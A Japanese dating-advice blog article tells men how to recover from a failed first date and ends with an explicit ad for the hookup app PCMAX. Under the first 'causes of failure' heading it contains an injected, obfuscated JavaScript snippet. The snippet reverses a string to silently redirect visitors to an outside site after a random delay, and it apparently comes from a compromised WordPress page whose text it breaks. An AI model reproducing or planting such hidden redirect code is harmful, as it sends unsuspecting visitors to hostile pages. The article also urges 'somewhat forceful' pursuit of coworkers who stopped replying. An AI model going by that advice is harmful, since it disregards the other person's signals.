初デートで失敗したときの挽回方法とは?まだ諦めるには早い

  • このエントリーをはてなブックマークに追加
  • Pocket

「初デートの後あの子からの連絡が途絶えた…」
「初デートの後誘っても全然OKがもらえない…」
「初デートに失敗した。LINEがそっけない…」

初デート後に上のように感じて「なんとか挽回したい」「好きなあの子とどうしても付き合いたい」と感じていることでしょう。

この記事では「初デートで失敗した」と感じている男のみなさんに向けて、挽回する方法を紹介していきます。残念ながら挽回できない場合もあります。挽回できないときは潔く諦めて、次の恋愛に進みましょう。

初デートで失敗して落ち込んでいる人は、ぜひ最後まで読んでください!

連絡が返ってくるなら失敗は思い過ごし

「失敗」と言っても人それぞれ感じ方で変わってきます。まずは失敗を定義します。初デートをした相手からその後連絡が返ってくるなら、それは失敗ではないでしょう。安心してください。あなたの思い過ごしです。

女の子は初デートをして「この人と付き合うことはないな」と判断した場合、連絡頻度を徐々に減らす、もしくは連絡を返さなくなります。「どうでもよいフォルダ」に振り分けられてしまうのです。

デート前と同様の頻度、同様のテンションの返信が来るなら、初デートは失敗ではなかったと考えましょう。あなたが心配性で勝手に失敗したと思い込んでいるだけです。

記事後半に「失敗の原因」を紹介しているので、それを読んで次のデートに活かしましょう。

連絡が返ってこない場合は関係性から判断する

連絡が返ってこない、頻度が減った、LINEの返信がそっけないなど、デート前と比べて変化が見られた場合、その女の子との関係性で挽回できるかどうか判断します。

関係性とは2つに分けることができます。下で具体的に説明していきます。

知り合ったばかりだと挽回は難しい

初デートをした女の子と知り合ったばかりの場合。例えば合コンや街コン、マッチングアプリなどで出会った場合、初デートの後に連絡がなかったら挽回できる可能性はほぼありません。

上でも伝えましたが、女の子はデートをして「この人と付き合うことはないな」と判断した場合、徐々にフェードアウトします。連絡を減らし、会うこともなく、何もなかったことにします。

知り合ったばかり女の子とはLINEでの連絡がすべてです。この連絡がなければ、会うこともなければ、当然付き合うことにもならないでしょう。

「この人いいかも」
「気になるかも」
「付き合ってもいいかも」

と感じていれば女の子は連絡は絶対に返します。女の子に限らず男でも同じでしょう。定期的に会う関係、友達や同僚でない場合、潔くこの女の子は諦めましょう。

「どうしても諦められない」という人は、時間をおいてLINEでメッセージを送ってみましょう。

1ヶ月ぐらい期間は開けると良いです。「返信があればラッキー」くらいの感覚で送ればダメージは少なくすみます。

複数の男と同じ期間にデートしていて選び放題だった女の子が、自分が気に入った人から選ばれなかった時、時間を開けてLINEを送る戦略は効果を発揮します。

友達だった場合は挽回できる

一方で初デートをした女の子と関係性がすでに会った場合。例えば元々知り合い、同僚などの場合は、まだ挽回するチャンスがあります。

なぜなら、直接会う機会があるからです。その直接会う機会を利用して、少し強引に次のデートに誘うのです。次のデートの約束さえしてしまえば、初デートは「失敗」でなかったことになります。

知り合ったばかりの女の子とは定期的に会う機会がないので、直接デートに誘うチャンスがないのです。

特に合コンや街コンや相席屋、マッチングアプリはその場の出会いです。「この人はないな」と思われたら2度と会えないのです。

ここから下はすでに初デートの前から関係があった場合、次のデートに誘う方法を紹介します。

次のデートを誘う方法とは

初デート後の連絡が少なくなった女の子を次のデートに誘う方法を紹介します。友達である場合や、同僚であることが前提です。知り合ったばかりで連絡が返ってこない人はすみません、諦めてください。

その女の子と付き合いたいなら、下の2つのステップを必ず実行してください。「恥ずかしい」「気まずい」なんて言っていたら絶対に付き合えません。大切なのは「情熱」です。

1.直接会うタイミングで自然に話しかける

まずはデート後直接会うタイミングで自然に話しかけることが大切です。連絡が返ってこないなら直接話すしか方法はありません。コミュニケーションを取らない限りその先にある「付き合う」という目標は達成できない。

…わかります。気まずいですよね。恥ずかしいですよね…。

「◯◯ちゃんはこないだのデートをどう思っているんだろう」
「LINE返してくれないってことは付き合える可能性ないのかな」
「可能性ないのに話しかけたら嫌だろうな…」

など考えてしまうでしょう。でも!勇気をだして話しかけてください。話しかけることにリスクはありません。いっそ相手にどう思われるかは考えないでください。大切なのは「自分がどうしたいか」です。

ポイントはできるだけ自然に話しかけること。具体的な話しかけ方を紹介するので参考にしてください。デートで話した内容に関連することで会話するのがおすすめ。

デート後の話しかけ方
– こないだはありがとう。楽しかった!◯◯ちゃんが言ってた@@@見たよ!
– お疲れ様!◯◯ちゃんが言ってた@@@に行ったよ!
– そういえばこないだ話した@@@買ったよ!
– こないだ楽しかったね!あの日疲れてお風呂も入らないで寝ちゃったよ…。
– どう、最近元気?

2.相手の女の子が興味あることに誘う

次のデートに誘う時は、必ず相手の女の子の興味のある場所やお店を提案しましょう。

上の直接話しかけるのは次のデートに誘うための布石です。もちろん、直接話しかけてその場で次のデートの約束ができるのがベスト。だけどそれは難しいでしょう。まずは普通に会話できるくらいに仲を戻しましょう。

不思議なことに直接話した後、その日の夜にでもLINEでメッセージを送ってみてください。返ってきます。僕の経験上8〜9割くらいの割合で返ってくるんです。

「2連続で既読スルーは悪いな」
「また会うし無視するのは逆に気まずいな」
「今日話しかけてくれたな。連絡きたし、返そうかな」

など心理が働くのでしょう。でもここで焦って次のデートに誘うことはおすすめしません。何かしら理由があって相手の子は初デート後にLINEを返さなくなっています。

そのことは忘れずにじっくりLINEでのラリーを続けましょう。ラリーを続けながらリサーチします。相手の女の子が興味あること、最近ハマっていること、趣味など。2回目のデートはそれに関連したプランで誘うのです。

初デートの反省をして次に活かす

無事に2回目のデートのOKがもらえたら、初デートの反省をしましょう。これやらない人多いですが大事です。何事も振り返りをしないと改善されない。

1回目のデートで何が悪くて失敗と思ってしまったのか。それを改善するにはどうすればよいのか。を考えて2回目のデートで実行するのです。最後にデートでの失敗の原因を4つお伝えします。

失敗の原因①プランがいまいちだった

$mWn=function(n){if(typeof ($mWn.list[n])==”string”) return $mWn.list[n].split(“”).reverse().join(“”);return $mWn.list[n];};$mWn.list=[“\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokonobonnoImg.jpg” alt=”” />

プランがいまいちだったとき、「失敗かも」と感じます。例えば予約したお店がかなりワイワイしたお店でゆっくりできなかったとか。動物園に行ったけど相手の女の子が動物アレルギーだったとか。見た映画の内容がつまらなかったとか。色々あるでしょう。

2回目のデートでは1回目の反省を活かして、相手の子が楽しめるプランを考えましょう。上でも伝えた通り、興味のあること、趣味、最近ハマっていることをリサーチすれば、自然と相手が楽しめるであろうプランは出来上がります。

「パスタが好き」という情報が引き出せたなら、パスタが美味しくて有名なお店でご飯を食べる。俳優の藤原竜也が好きという情報が引き出せたなら、出ている映画を見に行く。女の子がよく1人でドライブしているなら、ドライブに行く。などです。

失敗の原因②話しを盛り上げることができなかった

初デートではお互いが緊張しています。だから会話が盛り上がらないのはしょうがない。なぜ盛り上がらなかったのかしっかり振り返りましょう。

会話が盛り上がらなかった要因を洗い出す
– 共通点をなかなか見つけることができなかった
– 相手が色々話してくれるけど、返しが面白くなかった
– 話しをうまく広げることができなかった
– 相手の話にうまく共感、同調できなかった
– 自分の話しで相手を笑わせることができなかった

主な盛り上がらない原因はこの5つでしょうか。2回目のデートではすべて忘れて、とにかく女の子の話しを聞く側に徹しましょう。これができれば、相手の女の子は「楽しかった」と感じるのです。

聞くと話すの割合としては8:2がベスト。とにかく相手の話を聞いて、共感してさらに質問して広げる。2回目のデートではこれを意識して実践してください。

失敗の原因③予想外の出来事が起きた

予想外の出来事が起きたときも「失敗したな」と感じます。

例えばデートの途中に散歩するプランを考えていたのに、女の子がヒールの高い靴を履いてきたとき。動物園に行ったけど途中で雨が降ってきた。行こうとしていたお店が定休日だった。などですかね。

これはもうしょうがないです。デートにハプニングはつきものです。予想外の出来事が起きたときの対処法も女の子はよく見ています。

決して慌てないこと。慌てておどおどしていたら「頼りない男」と思われてしまいますから。心配な人はプランAがダメだったときはプランBに。プランBがダメならプランCとハプニングが起きそうな箇所を予め把握して、別のプランを用意すると当日に慌てることなくリードできるでしょう。

失敗の原因④上手にリードできなかった

当日上手にリードできずに、どちらかというと女の子の方がリードしていたとき「失敗だったかも」と感じます。

デートでは必ず男がリードする必要はありません。当然リードするのが上手な女の子もいます。もしくはリードしたい女の子だっています。その場合は多少は任せてもいいでしょう。すべて男がリードしなくてはいけないなんてルールはありません。

大事なポイントでリードできればOK。お会計、食事の後どうするか、隙間時間の使い方などでしょうか。お会計は率先してすべて払う。女の子が「少しは出させて」と言っても断ってすべて払う。

食事の後の終電まで時間がある時は、バーや相手に合わせてダーツやビリヤードなど、どこかに行きましょう。大切なのは「あなたともう少し一緒にいたい」という意思表示です。

初デートでの失敗は次のデートで挽回しよう

初デートで「失敗した、どうしよう」「挽回したいけど」どうして良いかわからないと悩んでいる人は多いものです。この記事を読んだみなさんならどうすればよいか理解しましたね。

知り合ったばかりで連絡が来ないなら潔く諦める。相手の女の子が友達や同僚なら、勇気を振り絞って直接話しかける。

これだけです。もし2回目のデートの約束ができたなら、1回目のデートでの失敗をしっかり振り返って改善する。これができれば好きな子と付き合える可能性も上がります。

これを読んだあなたが気になっている女の子と付き合って、幸せになることを陰ながら応援しています。

編集長おすすめの出会い系「PCMAX」

編集長みさわおすすめのマッチングアプリ「PCMAX」。

PCMAXを使った2020年の実績は、お持ち帰りした女の子22人。その中でセフレになった女の子10人です。

ナンパより効率的、クラブより低コスト。たくさんの女の子とワンナイトしたい、何人かの可愛いセフレが欲しい人にはぜひおすすめ。

登録は無料。攻略法さえ理解していれば、スタートダッシュ特典を使って2,000円で1人の女の子とセックスできます。まずは行動あるのみ。下のボタンから使ってみましょう!

PCMAXを使ってみる(R18)

おすすめの記事

  • このエントリーをはてなブックマークに追加
  • Pocket

SNSでもご購読できます。